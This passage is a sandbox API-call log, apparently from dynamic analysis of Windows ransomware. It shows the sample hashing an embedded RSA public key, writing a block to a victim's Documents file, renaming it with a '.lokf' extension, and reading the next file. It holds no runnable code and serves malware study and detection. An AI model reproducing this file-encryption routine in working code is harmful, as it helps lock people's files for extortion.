KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.828] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.829] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.829] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.829] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.829] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.829] GetLastError () returned 0x0 [0058.829] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.829] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.829] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.829] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.829] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.829] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.830] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.830] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.830] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.830] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.830] CloseHandle (hObject=0x5cc) returned 1 [0058.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.831] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aam-uk.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aam-uk.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aam-uk.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aam-uk.xlsx.lokf")) returned 1 [0058.832] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1cdeff0, ftCreationTime.dwHighDateTime=0x1d4d53a, ftLastAccessTime.dwLowDateTime=0xe5b9dae0, ftLastAccessTime.dwHighDateTime=0x1d4ce82, ftLastWriteTime.dwLowDateTime=0xe5b9dae0, ftLastWriteTime.dwHighDateTime=0x1d4ce82, nFileSizeHigh=0x0, nFileSizeLow=0x12167, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahBvw6Tj3LoXOmjTDa.pptx", cAlternateFileName="AHBVW6~1.PPT")) returned 1 [0058.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.832] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ahBvw6Tj3LoXOmjTDa.pptx") returned=".pptx" [0058.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ahBvw6Tj3LoXOmjTDa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ahbvw6tj3loxomjtda.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.832] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=74087) returned 1 [0058.833] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.835] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12141, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.835] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.836] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.836] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12167, lpOverlapped=0x0) returned 1 [0058.836] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.836] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.836] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.836] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.837] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.837] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.837] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.837] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.837] GetLastError () returned 0x0 [0058.837] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.837] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.837] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.837] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.837] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12170) returned 0x9c83710 [0058.838] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82ad0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b190 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82b18 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1a8 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1d8 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1f0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.838] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1d8 | out: hHeap=0x660000) returned 1 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1f0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b1d8 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1d8 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.839] GetCurrentThreadId () returned 0x9e0 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7cde8 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.839] GetCurrentThreadId () returned 0x9e0 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1d8 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1f0 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1c0 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b208 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1d8 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1d8 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1d8 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.841] 